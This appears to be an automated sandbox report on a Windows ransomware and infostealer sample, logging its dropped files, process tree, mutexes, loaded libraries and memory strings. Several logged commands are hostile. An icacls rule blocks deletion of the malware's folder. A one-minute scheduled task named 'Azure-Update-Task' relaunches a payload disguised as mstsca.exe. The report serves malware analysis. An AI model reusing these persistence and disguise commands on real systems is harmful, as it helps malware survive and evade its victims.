Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fve.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\device.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\edriveapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbusapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nbp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nkp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\usb.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blkcache.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\disk.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\locate.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\block.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\edriveapi.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fileapi.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\device.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\serialapi.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbus.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbus.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\devlog.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd2.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blocksup.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partition.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blkcache.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uriapi.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\guiddef.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\tcglib.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramdiskvhd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vdiskapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\devlog.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhdutil.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd2.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partapi.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udpapi.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udpapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partition.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nbp.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\diskapi.obj
Source: download.error.5.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd.obj

Source: classification engine

Classification label: mal100.rans.spre.troj.spyw.evad.winEXE@45/1414@8/5

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 1_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,

1_2_00411900

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 0_2_044497C6 CreateToolhelp32Snapshot,Module32First,

0_2_044497C6

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 1_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,

1_2_0040D240

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

File created: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144

Jump to behavior

Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1088:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4400:120:WilError_03

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: --ForNetRes	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: --Task	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: --AutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: --Service	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: X1P	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: runas	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: x2Q	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: x*P	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: C:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: D:\Windows\	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: 7P	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: %username%	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: F:\	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: --Admin	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: IsAutoStart	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: IsTask	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: --ForNetRes	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: IsAutoStart	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: IsTask	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: --Task	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: --AutoStart	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: --Service	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: X1P	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: --Admin	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: runas	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: x2Q	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: x*P	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: C:\Windows\	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: D:\Windows\	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: 7P	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: %username%	5_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Command line argument: F:\	5_2_00419F90

Source: sIQywRNC5M.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: build2.exe, 00000009.00000002.2290689219.0000000020E98000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2290109902.000000001E958000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: build2.exe, 00000009.00000002.2290689219.0000000020E98000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2290109902.000000001E958000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: build2.exe, 00000009.00000002.2290689219.0000000020E98000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2290109902.000000001E958000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: build2.exe, 00000009.00000002.2290689219.0000000020E98000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2290109902.000000001E958000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: build2.exe, 00000009.00000002.2290689219.0000000020E98000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2290109902.000000001E958000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: build2.exe, 00000009.00000002.2290689219.0000000020E98000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2290109902.000000001E958000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: build2.exe, 00000009.00000002.2290689219.0000000020E98000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2290109902.000000001E958000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: build2.exe, 00000009.00000002.2290689219.0000000020E98000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2290109902.000000001E958000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: build2.exe, 00000009.00000002.2290689219.0000000020E98000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2290109902.000000001E958000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: build2.exe, 00000009.00000002.2287398804.00000000008EF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.00000000008F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: build2.exe, 00000009.00000002.2290689219.0000000020E98000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2290109902.000000001E958000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: build2.exe, 00000009.00000002.2290689219.0000000020E98000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2290109902.000000001E958000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: sIQywRNC5M.exe	Virustotal: Detection: 42%
Source: sIQywRNC5M.exe	ReversingLabs: Detection: 42%

Source: sIQywRNC5M.exe	String found in binary or memory: set-addPolicy
Source: sIQywRNC5M.exe	String found in binary or memory: id-cmc-addExtensions
Source: sIQywRNC5M.exe	String found in binary or memory: set-addPolicy
Source: sIQywRNC5M.exe	String found in binary or memory: id-cmc-addExtensions
Source: sIQywRNC5M.exe	String found in binary or memory: set-addPolicy
Source: sIQywRNC5M.exe	String found in binary or memory: id-cmc-addExtensions
Source: sIQywRNC5M.exe	String found in binary or memory: set-addPolicy
Source: sIQywRNC5M.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

File read: C:\Users\user\Desktop\sIQywRNC5M.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\sIQywRNC5M.exe "C:\Users\user\Desktop\sIQywRNC5M.exe"
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Users\user\Desktop\sIQywRNC5M.exe "C:\Users\user\Desktop\sIQywRNC5M.exe"
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Users\user\Desktop\sIQywRNC5M.exe "C:\Users\user\Desktop\sIQywRNC5M.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Users\user\Desktop\sIQywRNC5M.exe "C:\Users\user\Desktop\sIQywRNC5M.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown	Process created: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe --Task
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Process created: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe --Task
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe"
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Process created: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe"
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe"
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	Process created: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe"
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe" --AutoStart
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Process created: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe" --AutoStart
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe" --AutoStart
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Process created: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Users\user\Desktop\sIQywRNC5M.exe "C:\Users\user\Desktop\sIQywRNC5M.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Users\user\Desktop\sIQywRNC5M.exe "C:\Users\user\Desktop\sIQywRNC5M.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Users\user\Desktop\sIQywRNC5M.exe "C:\Users\user\Desktop\sIQywRNC5M.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Process created: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe --Task
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Process created: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe"
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	Process created: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe"
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Process created: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Process created: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Section loaded: dnsapi.dll	Jump to behavior
